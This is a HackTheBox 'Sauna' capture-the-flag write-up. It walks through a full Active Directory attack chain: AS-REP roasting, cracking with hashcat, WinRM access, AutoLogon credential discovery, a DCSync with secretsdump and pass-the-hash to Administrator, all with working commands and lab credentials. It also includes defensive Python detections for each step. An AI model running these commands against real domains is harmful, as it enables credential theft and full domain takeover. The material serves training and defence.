Sauna.
Easy Windows Active Directory AS-REP Roasting DCSync AutoLogon HackTheBox
Beginner-friendly Active Directory machine teaching a classic real-world attack chain: harvest employee names from a public website, generate AD username candidates, AS-REP Roast a user with pre-authentication disabled, find plaintext credentials in the Windows AutoLogon registry key, then perform a DCSync attack via GetChangesAll to dump all domain hashes and pass-the-hash as Administrator.
User Flag
5552b074550axxxxxxxxxxxxxxxxxxxx
Root Flag
01d83bce08bbxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance — Nmap

Full port scan against the target. The open ports immediately identify this as a Domain Controller.

nmap
$ nmap -sC -sV -p- --min-rate 5000 -oN nmap_full.txt 10.129.35.227
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS 10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
389/tcp  open  ldap          Active Directory (Domain: EGOTISTICAL-BANK.LOCAL)
445/tcp  open  microsoft-ds  SMB
5985/tcp open  http          WinRM
DC confirmed: ports 88 (Kerberos) + 389 (LDAP) + 53 (DNS) = Domain Controller. Domain: EGOTISTICAL-BANK.LOCAL. Port 5985 (WinRM) open — valid credentials will give us a shell.
02 Web Enumeration — Harvesting Employee Names

Browsing http://10.129.35.227 reveals the Egotistical Bank website. The About page lists the full names of team members — valuable for generating AD username candidates.

team.txt — names from the website
fergus smith
shaun coins
sophie driver
bowie taylor
hugo bear
steven kerb
why this matters: AD usernames are almost always derived from real names (fsmith, fergus.smith, f.smith, etc.). Harvesting names from a public-facing site is a zero-noise recon technique — no login, no alerts.
03 Username Generation — username-anarchy

username-anarchy takes real names and generates every common AD username format automatically — fsmith, fergus.smith, smithf, fergussmith, and dozens more per person.

username-anarchy
$ ./username-anarchy --input-file team.txt > usernames.txt
04 AS-REP Roasting — GetNPUsers

When Kerberos pre-authentication is disabled on an account, anyone can request a TGT for it without proving knowledge of the password. The DC's AS-REP contains a blob encrypted with a key derived from the account's password (with RC4, etype 23, that key is the NT hash itself), and that blob can be cracked offline. No lockout risk, because no password guess is ever submitted to the DC, and on the wire it looks like an ordinary Kerberos AS request.

impacket-GetNPUsers — test all username candidates
$ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -dc-ip 10.129.35.227 -no-pass -usersfile usernames.txt
[-] KDC_ERR_C_PRINCIPAL_UNKNOWN — username doesn't exist
[-] KDC_ERR_C_PRINCIPAL_UNKNOWN — username doesn't exist
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:fe7f2dbf...   ← HASH CAPTURED
[-] KDC_ERR_C_PRINCIPAL_UNKNOWN — username doesn't exist
hit: fsmith (Fergus Smith) has pre-authentication disabled. AS-REP hash captured — crack it offline.
hashcat — mode 18200 (Kerberos AS-REP)
$ hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:...:Thestrokes23
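Two defender-side checks for the weakness this section exploits, added here as an example and not part of the original writeup. The first audits which accounts carry the DONT_REQ_PREAUTH flag (userAccountControl bit 0x400000), which is exactly what makes fsmith roastable. The second runs over Event ID 4768 (Kerberos TGT requested) records and flags successful requests made with pre-authentication type 0 and an RC4 (0x17) ticket, plus any source that produces a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN (status 0x6) failures, which is what the username-list sweep above looks like from the DC's side. The account list, the event lines and the 10.10.14.5 source address are constructed sample data, not output from the box.

```python
import re
from collections import Counter

# userAccountControl bit "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH)
DONT_REQ_PREAUTH = 0x400000

# Constructed sample of an LDAP export: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("hsmith", 0x10200),        # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD
    ("fsmith", 0x410200),       # same, plus DONT_REQ_PREAUTH: roastable
    ("svc_loanmgr", 0x10200),
]

def preauth_disabled(uac: int) -> bool:
    """True when the account's AS-REP can be obtained without pre-authentication."""
    return bool(uac & DONT_REQ_PREAUTH)

def audit_accounts(accounts):
    """sAMAccountNames whose AS-REP anyone can request and crack offline."""
    return [name for name, uac in accounts if preauth_disabled(uac)]

# Constructed Event ID 4768 records flattened to key=value, as a SIEM might store them.
# Status 0x6 = KDC_ERR_C_PRINCIPAL_UNKNOWN (failed requests carry "-" / 0xffffffff),
# PreAuthType 0 = no pre-auth, TicketEncryptionType 0x17 = RC4-HMAC, 0x12 = AES256.
SAMPLE_4768 = """\
EventID=4768 TargetUserName=hsmith PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.129.35.227 Status=0x0
EventID=4768 TargetUserName=fergus.smith PreAuthType=- TicketEncryptionType=0xffffffff IpAddress=10.10.14.5 Status=0x6
EventID=4768 TargetUserName=smithf PreAuthType=- TicketEncryptionType=0xffffffff IpAddress=10.10.14.5 Status=0x6
EventID=4768 TargetUserName=fsmith PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.5 Status=0x0
EventID=4768 TargetUserName=s.coins PreAuthType=- TicketEncryptionType=0xffffffff IpAddress=10.10.14.5 Status=0x6
"""

def parse_kv(line: str) -> dict:
    """Split a 'key=value key=value' line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def events(log_text: str, event_id: str):
    """Yield parsed records with the given EventID."""
    for line in log_text.splitlines():
        ev = parse_kv(line)
        if ev.get("EventID") == event_id:
            yield ev

def detect_asrep_roast(log_text: str):
    """Successful TGT requests with no pre-auth and an RC4 ticket: [(user, source ip)]."""
    return [
        (ev["TargetUserName"], ev["IpAddress"])
        for ev in events(log_text, "4768")
        if ev.get("Status") == "0x0"
        and ev.get("PreAuthType") == "0"
        and ev.get("TicketEncryptionType", "").lower() == "0x17"
    ]

def detect_user_enumeration(log_text: str, threshold: int = 3):
    """Sources with at least `threshold` unknown-principal failures: {ip: count}."""
    failures = Counter(
        ev["IpAddress"] for ev in events(log_text, "4768") if ev.get("Status") == "0x6"
    )
    return {ip: n for ip, n in failures.items() if n >= threshold}

if __name__ == "__main__":
    print("pre-auth disabled:", audit_accounts(SAMPLE_ACCOUNTS))
    print("AS-REP roast candidates:", detect_asrep_roast(SAMPLE_4768))
    print("username sweeps:", detect_user_enumeration(SAMPLE_4768))
```

On a real DC the 4768 client address is usually written as ::ffff:10.10.14.5, so strip that prefix before feeding events in. The fix for the audit finding is to clear the flag; where an application genuinely needs it, give the account a long random password and restrict it to AES so an RC4 AS-REP is never issued.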
05 Foothold — Evil-WinRM as fsmith

WinRM (port 5985) is open. fsmith's cracked credentials give us an interactive shell.

evil-winrm → user flag
$ evil-winrm -i 10.129.35.227 -u fsmith -p 'Thestrokes23'
*Evil-WinRM* PS C:\Users\FSmith\Desktop> cat user.txt
5552b074550axxxxxxxxxxxxxxxxxxxx
06 Post-Exploitation — WinPEAS & AutoLogon Credentials

fsmith is a regular user. Upload WinPEAS to enumerate privilege escalation paths — it checks hundreds of misconfigurations including stored credentials, vulnerable services, and registry keys.

upload and run WinPEAS
*Evil-WinRM* PS C:\> upload /home/kali/winPEASany.exe winp.exe
*Evil-WinRM* PS C:\> ./winp.exe
WinPEAS output — AutoLogon credentials
Looking for AutoLogon credentials
DefaultDomainName : EGOTISTICALBANK
DefaultUserName   : EGOTISTICALBANK\svc_loanmanager
DefaultPassword   : Moneymakestheworldgoround!
AutoLogon: Windows stores auto-login credentials in plaintext in the DefaultPassword value under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, a key any local user can read. WinPEAS always checks here — it's a classic finding in real engagements too.

The registry shows svc_loanmanager but the actual AD account is svc_loanmgr — a common discrepancy.
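An audit of the Winlogon key itself, added here as an example and not taken from the writeup. It parses the text of a `reg export` of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon and reports whether AutoAdminLogon is switched on and whether DefaultPassword holds a plaintext value. The export below is constructed from the values WinPEAS printed; the GPExtensions subkey and its value are filler to show that subkeys are ignored.

```python
import re

WINLOGON_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed sample of `reg export` output for the Winlogon key. Real exports are
# UTF-16LE files; decode them to str before passing the text in.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
"DefaultDomainName"="EGOTISTICALBANK"
"DefaultUserName"="EGOTISTICALBANK\\svc_loanmanager"
"DefaultPassword"="Moneymakestheworldgoround!"
"AutoLogonCount"=dword:00000000
"Shell"="explorer.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions]
"Placeholder"="constructed filler value"
'''

def parse_reg(text: str) -> dict:
    """Minimal .reg parser: {key path: {value name: value}} for REG_SZ and REG_DWORD."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = re.match(r'"((?:[^"\\]|\\.)*)"=(.*)$', line)
            if not m:
                continue
            name, rhs = m.group(1), m.group(2)
            if rhs.startswith('"') and rhs.endswith('"'):
                # REG_SZ: undo the .reg escaping of backslashes and quotes
                value = rhs[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            elif rhs.startswith("dword:"):
                value = int(rhs[len("dword:"):], 16)
            else:
                value = rhs  # hex:, expand strings etc. are kept raw
            keys[current][name] = value
    return keys

def autologon_findings(reg_text: str) -> list:
    """Human-readable findings for the Winlogon key, in a fixed order."""
    values = parse_reg(reg_text).get(WINLOGON_KEY, {})
    findings = []
    if str(values.get("AutoAdminLogon", "0")) == "1":
        findings.append("AutoAdminLogon is enabled")
    if values.get("DefaultPassword"):
        user = values.get("DefaultUserName", "<unknown>")
        domain = values.get("DefaultDomainName", "")
        who = user if "\\" in user else f"{domain}\\{user}"
        findings.append(f"DefaultPassword is stored in plaintext for {who}")
    return findings

if __name__ == "__main__":
    for finding in autologon_findings(SAMPLE_REG_EXPORT):
        print("[!]", finding)
```

Where auto-logon cannot be avoided, the Sysinternals Autologon tool writes the password as an LSA secret instead of into DefaultPassword, which keeps it away from ordinary local users (an administrator can still recover it). A scheduled run of this check against exported Winlogon keys from workstations and servers catches the plaintext variant before a privilege-escalation tool does.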

validate svc_loanmgr credentials
$ nxc smb 10.129.35.227 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
[+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround!
$ nxc winrm 10.129.35.227 -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!'
[+] EGOTISTICAL-BANK.LOCAL\svc_loanmgr:Moneymakestheworldgoround! (Pwn3d!)

Run BloodHound as svc_loanmgr to map AD attack paths.

BloodHound collection
$ bloodhound-python -u 'svc_loanmgr' -p 'Moneymakestheworldgoround!' -d EGOTISTICAL-BANK.LOCAL -ns 10.129.35.227 -c All --zip
BloodHound finding: svc_loanmgr has GetChangesAll (DS-Replication-Get-Changes-All) over the domain — the permission DCs use to replicate with each other. This allows a full DCSync attack.
07 Privilege Escalation — DCSync

GetChangesAll (together with the plain Get-Changes right that DCSync also needs) lets us impersonate a Domain Controller and pull every account's NT hash and Kerberos keys over the replication RPC. We run secretsdump remotely from Kali — no need to be on the machine.

impacket-secretsdump — DCSync
$ impacket-secretsdump 'EGOTISTICAL-BANK.LOCAL'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.129.35.227'
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:...
HSmith:1103:...
FSmith:1105:...
svc_loanmgr:1108:...
Administrator NT hash: 823452073d75b9d1cf70ebdf86c7f98e. Each line is username:RID:LM_hash:NT_hash:::; the LM field aad3b435b51404eeaad3b435b51404ee is the fixed value meaning no LM hash is stored. We don't need to crack the NT hash.
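The replication performed by secretsdump above is logged by the DC as Event ID 4662 on the domain object, with the replication control-access-right GUIDs in the Properties field. The following is an added example, not part of the writeup, of the two checks a defender would run for this step: a detection over 4662 records that alerts when any principal outside an allowlist of DC accounts uses a replication right, and an audit over the domain head's ACL that lists who holds those rights. The event lines, the ACL entries, the SAUNA$ computer account and the allowlist are constructed for the example; the three GUIDs are the real well-known values for the replication rights.

```python
import re

# Control-access-right GUIDs that appear in the Properties field of a 4662 when
# a principal replicates directory data (the operations DCSync relies on).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed allowlist: DC computer accounts (and any sanctioned sync service)
# that are expected to replicate. SAUNA$ is assumed to be the DC's own account.
ALLOWED_REPLICATORS = {"EGOTISTICAL-BANK\\SAUNA$"}

# Constructed 4662 records flattened to key=value. First: normal DC replication;
# second: the DCSync from this writeup; third: unrelated object access, must not alert.
SAMPLE_4662 = """\
EventID=4662 SubjectDomainName=EGOTISTICAL-BANK SubjectUserName=SAUNA$ ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2},{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100
EventID=4662 SubjectDomainName=EGOTISTICAL-BANK SubjectUserName=svc_loanmgr ObjectType=%{19195a5b-6da0-11d0-afd3-00c04fd930c9} Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2},{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} AccessMask=0x100
EventID=4662 SubjectDomainName=EGOTISTICAL-BANK SubjectUserName=fsmith ObjectType=%{bf967aba-0de6-11d0-a285-00aa003049e2} Properties={bf967a68-0de6-11d0-a285-00aa003049e2} AccessMask=0x10
"""

GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")

def parse_kv(line: str) -> dict:
    """Split a 'key=value key=value' line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def replication_rights(properties: str) -> list:
    """Names of the replication rights referenced anywhere in a Properties field."""
    guids = set(GUID_RE.findall(properties.lower()))
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)

def detect_dcsync(log_text: str, allowlist=ALLOWED_REPLICATORS) -> list:
    """Replication-right use by a principal outside the allowlist: [(principal, rights)]."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_kv(line)
        if ev.get("EventID") != "4662":
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if not rights:
            continue
        principal = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'
        if principal not in allowlist:
            alerts.append((principal, rights))
    return alerts

# Constructed ACL export of the domain head: (principal, rights GUID, AccessControlType),
# the shape you get from the Access entries of Get-Acl on the domain object.
SAMPLE_ACES = [
    ("EGOTISTICAL-BANK\\Domain Controllers", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "Allow"),
    ("EGOTISTICAL-BANK\\svc_loanmgr", "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "Allow"),
    ("EGOTISTICAL-BANK\\svc_loanmgr", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "Allow"),
    ("EGOTISTICAL-BANK\\hsmith", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "Deny"),
]
EXPECTED_ACL_HOLDERS = {"EGOTISTICAL-BANK\\Domain Controllers"}

def audit_replication_aces(aces, expected=EXPECTED_ACL_HOLDERS) -> dict:
    """Principals granted (Allow) any replication right who are not expected to hold it."""
    findings = {}
    for principal, guid, ace_type in aces:
        name = REPLICATION_RIGHTS.get(guid.lower())
        if name and ace_type == "Allow" and principal not in expected:
            findings.setdefault(principal, []).append(name)
    return {p: sorted(r) for p, r in findings.items()}

if __name__ == "__main__":
    print("DCSync alerts:", detect_dcsync(SAMPLE_4662))
    print("unexpected replication ACEs:", audit_replication_aces(SAMPLE_ACES))
```

Real 4662 Properties fields carry extra tokens around the GUIDs, which is why the GUID regex is applied to the whole field rather than splitting on commas. The ACL audit is the preventive half: a service account holding Get-Changes-All on the domain head is a Tier-0 finding whether or not anyone has used it yet.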
08 Domain Compromise — Pass-the-Hash as Administrator

In Windows environments, the NTLM hash IS the credential. We can authenticate using it directly without cracking — this is Pass-the-Hash (PtH).

verify hash → shell → root flag
$ nxc smb 10.129.35.227 -u 'administrator' -H '823452073d75b9d1cf70ebdf86c7f98e'
[+] EGOTISTICAL-BANK.LOCAL\administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)
$ evil-winrm -i 10.129.35.227 -u administrator -H '823452073d75b9d1cf70ebdf86c7f98e'
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
01d83bce08bbxxxxxxxxxxxxxxxxxxxx
attack chain summary
[Website] Employee names → username-anarchy
    │
    ▼
GetNPUsers (AS-REP Roasting) → fsmith AS-REP hash → hashcat -m 18200 → fsmith:Thestrokes23
    │
    ▼
Evil-WinRM as fsmith → user.txt ✓
WinPEAS → AutoLogon registry key → svc_loanmgr:Moneymakestheworldgoround!
    │
    ▼
BloodHound → svc_loanmgr has GetChangesAll
secretsdump (DCSync) → Administrator NT hash
    │
    ▼
Pass-the-Hash → Evil-WinRM → root.txt ✓
key takeaways:
· Employee names on public sites → valid AD usernames — always enumerate web before touching AD
· AS-REP Roasting needs no credentials and causes no lockouts — test all username candidates
· AutoLogon stores plaintext passwords in the registry — WinPEAS finds this automatically
· GetChangesAll = DCSync = full domain compromise — flag it as critical in any assessment
· NTLM hashes are usable credentials — cracking is optional when you can pass-the-hash